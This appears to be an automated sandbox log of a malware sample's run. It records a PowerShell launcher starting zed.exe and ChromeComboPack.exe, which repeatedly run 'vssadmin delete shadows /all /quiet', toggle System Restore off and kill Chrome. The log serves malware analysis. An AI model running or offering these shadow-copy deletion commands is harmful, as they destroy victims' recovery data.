Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2192:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6880:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5332:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_httofq1n.fnk.ps1Jump to behavior
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: zed.exeString found in binary or memory: -startline must be less than or equal to -endline
Source: zed.exeString found in binary or memory: -help
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\back.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe "C:\Users\user\Documents\gogjothegoat\payload\zed.exe"
Source: unknownProcess created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe C:\Users\user\Documents\gogjothegoat\payload\zed.exe
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -File "C:\Users\user\Documents\gogjothegoat\payload\taskboy.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe "C:\Users\user\Documents\gogjothegoat\payload\zed.exe"
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Disable-ComputerRestore -Drive C:\\"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Enable-ComputerRestore -Drive C:\\"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Windows\System32\vssadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe C:\Users\user\Documents\gogjothegoat\payload\zed.exe
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Disable-ComputerRestore -Drive C:\\"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Enable-ComputerRestore -Drive C:\\"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Windows\System32\vssadmin.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe "C:\Users\user\Documents\gogjothegoat\payload\zed.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe" Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe "C:\Users\user\Documents\gogjothegoat\payload\zed.exe" Jump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\zed.exe C:\Users\user\Documents\gogjothegoat\payload\zed.exeJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Disable-ComputerRestore -Drive C:\\"
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Enable-ComputerRestore -Drive C:\\"
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Disable-ComputerRestore -Drive C:\\"
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Enable-ComputerRestore -Drive C:\\"
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeProcess created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /for=C: /all /quiet
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeProcess created: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe "C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe"
Source: C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: version.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: libffi-8.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: propsys.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: libcrypto-3.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: libssl-3.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: tcl86t.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: tk86t.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: netapi32.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: userenv.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: zlib1.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: logoncli.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: netutils.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: samcli.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: mswsock.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: dnsapi.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: rasadhlp.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: fwpuclnt.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: uxtheme.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: textinputframework.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: coreuicomponents.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: coremessaging.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: ntmarta.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: coremessaging.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: wintypes.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: wintypes.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dll
Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dll
Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
Source: C:\Windows\System32\vssadmin.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\vssadmin.exeSection loaded: vss_ps.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: version.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: vcruntime140.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: libffi-8.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: propsys.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: vcruntime140_1.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: libcrypto-3.dll
Source: C:\Users\user\Documents\gogjothegoat\payload\zed.exeSection loaded: libssl-3.dll
